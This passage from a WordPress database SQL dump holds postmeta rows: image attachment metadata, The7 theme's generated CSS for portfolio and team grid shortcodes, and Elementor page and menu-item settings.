}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:20:\"mlogo-8-2048x171.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:171;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25708;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5425,51,'the7_shortcodes_dynamic_css','a:2:{i:0;s:0:\"\";s:32:\"6fab11b38cfa342d3d3180fae29b4f0c\";s:14801:\".portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c.content-bg-on.classic-layout-list article {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c.dividers-on.classic-layout-list article {\n  padding-top: 0;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c.dividers-on.classic-layout-list article:first-of-type {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c.classic-layout-list.mode-list .post-entry-content {\n  width: calc(100% - );\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c.classic-layout-list.mode-list .no-img .post-entry-content {\n  width: 100%;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c.dividers-on:not(.mode-masonry) article {\n  margin-top: 0;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c.dividers-on:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c.dividers-on:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c.hover-scale article:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c.gradient-overlay-layout-list article {\n  border-radius: 0px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c .post-thumbnail-wrap {\n  padding: 20px 20px 0px 20px;\n  border-radius: 0px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c .post-thumbnail-wrap *,\n.portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c .post-thumbnail-rollover:after {\n  border-radius: 0px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c.enable-bg-rollover .post-thumbnail-rollover:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.bottom-overlap-layout-list.portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c .project-links-container {\n  height: calc(100% - 100px);\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c .project-links-container a {\n  width: 44px;\n  height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  margin: 10px 5px 10px;\n}\n.content-rollover-layout-list:not(.content-align-center).portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c .project-links-container a,\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c .project-links-container a {\n  margin: 10px 10px 10px 0;\n}\n.dt-icon-border-on.portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c .project-links-container a:before {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-hover-border-on.portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c .project-links-container a:after {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-bg-on.portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c .project-links-container a:before {\n  background: rgba(255,255,255,0.3);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.dt-icon-hover-bg-on.portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c .project-links-container a:after {\n  background: rgba(255,255,255,0.5);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c .project-links-container a > span:before {\n  font-size: 16px;\n  line-height: 44px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c .project-links-container a:not(:hover) > span {\n  color: #ffffff;\n}\n.dt-icon-hover-off.portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c .project-links-container a > span,\n.dt-icon-hover-off.portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.dt-icon-hover-on.portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c .entry-title,\n.portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c.owl-carousel .entry-title {\n  margin-bottom: 5px;\n  font-size: 22px;\n  line-height: 32px;\n  font-weight: bold;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c .entry-meta {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c .portfolio-categories {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c .entry-excerpt {\n  margin-bottom: 5px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c:not(.centered-layout-list) .post-entry-content {\n  padding: 20px 30px 30px 30px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\n  padding: 0;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c.content-bg-on:not(.classic-layout-list):not(.centered-layout-list):not(.gradient-overlay-layout-list) .post-entry-content {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c.gradient-overlay-layout-list .post-entry-content {\n  border-radius: 0px;\n}\n@media screen and (max-width: ) {\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c article {\n    -webkit-flex-flow: column nowrap;\n    -moz-flex-flow: column nowrap;\n    -ms-flex-flow: column nowrap;\n    flex-flow: column nowrap;\n    margin-top: 20px;\n  }\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c.dividers-on article {\n    border: none;\n  }\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c.content-bg-on.centered-layout-list article {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c .post-thumbnail-wrap,\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c .post-entry-content {\n    width: 100%;\n    margin: 0;\n    top: 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c .post-thumbnail-wrap {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c .post-entry-content:after {\n    display: none;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c .project-even .post-thumbnail-wrap,\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c.centered-layout-list .post-thumbnail-wrap {\n    -webkit-order: 0;\n    -moz-order: 0;\n    -ms-flex-order: 0;\n    order: 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c.centered-layout-list .post-entry-title-content {\n    -webkit-order: 1;\n    -moz-order: 1;\n    -ms-flex-order: 1;\n    order: 1;\n    width: 100%;\n    padding: 20px 20px 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c.centered-layout-list .post-entry-content {\n    -webkit-order: 2;\n    -moz-order: 2;\n    -ms-flex-order: 2;\n    order: 2;\n    padding-top: 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c .post-entry-content {\n    padding: 20px;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c .entry-title {\n    margin: 3px 0 5px;\n    font-size: 20px;\n    line-height: 26px;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c .entry-meta {\n    margin: 5px 0 5px;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c .entry-excerpt {\n    margin: 15px 0 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c .post-details {\n    margin: 5px 0 10px;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c .post-details.details-type-link {\n    margin-bottom: 2px;\n  }\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c:not(.resize-by-browser-width) .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c.resize-by-browser-width .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n  width: calc(33.333333333333%) * 2;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\n  grid-row-gap: 0px;\n}\n@media screen and (max-width: 1199px) {\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(33.333333333333%)*2;\n  }\n}\n@media screen and (max-width: 991px) {\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(50%)*2;\n  }\n}\n@media screen and (max-width: 767px) {\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c.resize-by-browser-width .dt-css-grid .double-width {\n    grid-column: span 1;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-6fab11b38cfa342d3d3180fae29b4f0c.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(100%)*2;\n  }\n}\n\";}'),
(5426,2173,'the7_shortcodes_dynamic_css','a:2:{i:0;s:0:\"\";s:32:\"2f530a677c3856efee62a795e00f99e7\";s:6874:\".dt-team-shortcode.team-masonry-shortcode-id-2f530a677c3856efee62a795e00f99e7 .team-desc {\n  padding: 20px 0px 0px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-2f530a677c3856efee62a795e00f99e7 .team-author-name,\n.dt-team-shortcode.team-masonry-shortcode-id-2f530a677c3856efee62a795e00f99e7 .team-author-name a {\n  margin-bottom: 10px;\n  font-size: 22px;\n  line-height: 32px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-2f530a677c3856efee62a795e00f99e7 .team-author p {\n  margin-bottom: 10px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-2f530a677c3856efee62a795e00f99e7  .team-media {\n  padding: 0px 0px 0px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-2f530a677c3856efee62a795e00f99e7  .team-media a,\n.dt-team-shortcode.team-masonry-shortcode-id-2f530a677c3856efee62a795e00f99e7  .team-media > span,\n.dt-team-shortcode.team-masonry-shortcode-id-2f530a677c3856efee62a795e00f99e7  .team-media img {\n  max-width: 150px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-2f530a677c3856efee62a795e00f99e7 .dt-css-grid .team-media img {\n  width: 150px;\n  max-width: 100%;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-2f530a677c3856efee62a795e00f99e7 .team-content {\n  margin-bottom: 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-2f530a677c3856efee62a795e00f99e7  .team-media,\n.dt-team-shortcode.team-masonry-shortcode-id-2f530a677c3856efee62a795e00f99e7  .team-media a.rollover,\n.dt-team-shortcode.team-masonry-shortcode-id-2f530a677c3856efee62a795e00f99e7  .team-media a.rollover *,\n.dt-team-shortcode.team-masonry-shortcode-id-2f530a677c3856efee62a795e00f99e7  .team-media img {\n  border-radius: 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-2f530a677c3856efee62a795e00f99e7 .soc-ico {\n  margin-bottom: 15px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-2f530a677c3856efee62a795e00f99e7 .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-2f530a677c3856efee62a795e00f99e7 .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-2f530a677c3856efee62a795e00f99e7 .soc-ico a:before,\n.dt-team-shortcode.team-masonry-shortcode-id-2f530a677c3856efee62a795e00f99e7 .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.dt-team-shortcode.team-masonry-shortcode-id-2f530a677c3856efee62a795e00f99e7 .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-2f530a677c3856efee62a795e00f99e7 .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-2f530a677c3856efee62a795e00f99e7 .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.dt-team-shortcode.team-masonry-shortcode-id-2f530a677c3856efee62a795e00f99e7 .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-2f530a677c3856efee62a795e00f99e7 .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-2f530a677c3856efee62a795e00f99e7 .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-2f530a677c3856efee62a795e00f99e7 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-2f530a677c3856efee62a795e00f99e7:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 50px;\n  grid-column-gap: 50px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-2f530a677c3856efee62a795e00f99e7:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-2f530a677c3856efee62a795e00f99e7:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -25px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-2f530a677c3856efee62a795e00f99e7:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-2f530a677c3856efee62a795e00f99e7:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 25px;\n  box-sizing: border-box;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-2f530a677c3856efee62a795e00f99e7.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 50px;\n  grid-row-gap: 50px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-2f530a677c3856efee62a795e00f99e7.resize-by-browser-width .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-2f530a677c3856efee62a795e00f99e7.resize-by-browser-width .dt-css-grid {\n  margin: -25px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-2f530a677c3856efee62a795e00f99e7.resize-by-browser-width .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-2f530a677c3856efee62a795e00f99e7.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 25px;\n}\n@media screen and (max-width: 1199px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-2f530a677c3856efee62a795e00f99e7.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-2f530a677c3856efee62a795e00f99e7.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-2f530a677c3856efee62a795e00f99e7.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n}\n@media screen and (max-width: 991px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-2f530a677c3856efee62a795e00f99e7.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-2f530a677c3856efee62a795e00f99e7.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-2f530a677c3856efee62a795e00f99e7.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n}\n@media screen and (max-width: 767px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-2f530a677c3856efee62a795e00f99e7.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-2f530a677c3856efee62a795e00f99e7.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-2f530a677c3856efee62a795e00f99e7.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n}\n\";}'),
(5427,2173,'_edit_lock','1665085064:1'),
(5478,2325,'_wp_attached_file','2022/10/aast2.png'),
(5479,2325,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:150;s:6:\"height\";i:150;s:4:\"file\";s:17:\"2022/10/aast2.png\";s:8:\"filesize\";i:49043;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5480,2326,'_wp_attached_file','2022/10/isprs.png'),
(5481,2326,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:135;s:6:\"height\";i:96;s:4:\"file\";s:17:\"2022/10/isprs.png\";s:8:\"filesize\";i:24610;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5482,2327,'_wp_page_template','default'),
(5483,2327,'_elementor_edit_mode','builder'),
(5484,2327,'_elementor_template_type','wp-page'),
(5485,2327,'_elementor_version','3.7.8'),
(5488,2328,'_wp_page_template','default'),
(5489,2328,'_elementor_edit_mode','builder'),
(5490,2328,'_elementor_template_type','wp-page'),
(5491,2328,'_elementor_version','3.7.8'),
(5493,2329,'_wp_page_template','default'),
(5494,2329,'_elementor_edit_mode','builder'),
(5495,2329,'_elementor_template_type','wp-page'),
(5496,2329,'_elementor_version','3.7.8'),
(5498,2330,'_wp_page_template','default'),
(5499,2330,'_elementor_edit_mode','builder'),
(5500,2330,'_elementor_template_type','wp-page'),
(5501,2330,'_elementor_version','3.7.8'),
(5503,2331,'_wp_page_template','default'),
(5504,2331,'_elementor_edit_mode','builder'),
(5505,2331,'_elementor_template_type','wp-page'),
(5506,2331,'_elementor_version','3.7.8'),
(5508,2332,'_wp_page_template','default'),
(5509,2332,'_elementor_edit_mode','builder'),
(5510,2332,'_elementor_template_type','wp-page'),
(5511,2332,'_elementor_version','3.7.8'),
(5513,2333,'_edit_last','1'),
(5514,2333,'_edit_lock','1665088402:1'),
(5515,2334,'_edit_last','1'),
(5516,2334,'_edit_lock','1665088648:1'),
(5517,2339,'_wp_page_template','default'),
(5518,2339,'_elementor_edit_mode','builder'),
(5519,2339,'_elementor_template_type','wp-page'),
(5520,2339,'_elementor_version','3.7.8'),
(5522,2340,'_wp_page_template','default'),
(5523,2340,'_elementor_edit_mode','builder'),
(5524,2340,'_elementor_template_type','wp-page'),
(5525,2340,'_elementor_version','3.7.8'),
(5527,2341,'_wp_page_template','default'),
(5528,2341,'_elementor_edit_mode','builder'),
(5529,2341,'_elementor_template_type','wp-page'),
(5530,2341,'_elementor_version','3.7.8'),
(5532,2342,'_wp_page_template','default'),
(5533,2342,'_elementor_edit_mode','builder'),
(5534,2342,'_elementor_template_type','wp-page'),
(5535,2342,'_elementor_version','3.7.8'),
(5537,2343,'_wp_page_template','default'),
(5538,2343,'_elementor_edit_mode','builder'),
(5539,2343,'_elementor_template_type','wp-page'),
(5540,2343,'_elementor_version','3.7.8'),
(5542,2344,'_wp_page_template','default'),
(5543,2344,'_elementor_edit_mode','builder'),
(5544,2344,'_elementor_template_type','wp-page'),
(5545,2344,'_elementor_version','3.7.8'),
(5547,2345,'_wp_page_template','default'),
(5548,2345,'_elementor_edit_mode','builder'),
(5549,2345,'_elementor_template_type','wp-page'),
(5550,2345,'_elementor_version','3.7.8'),
(5552,2346,'_menu_item_type','custom'),
(5553,2346,'_menu_item_menu_item_parent','2083'),
(5554,2346,'_menu_item_object_id','2346'),
(5555,2346,'_menu_item_object','custom'),
(5556,2346,'_menu_item_target','_blank'),
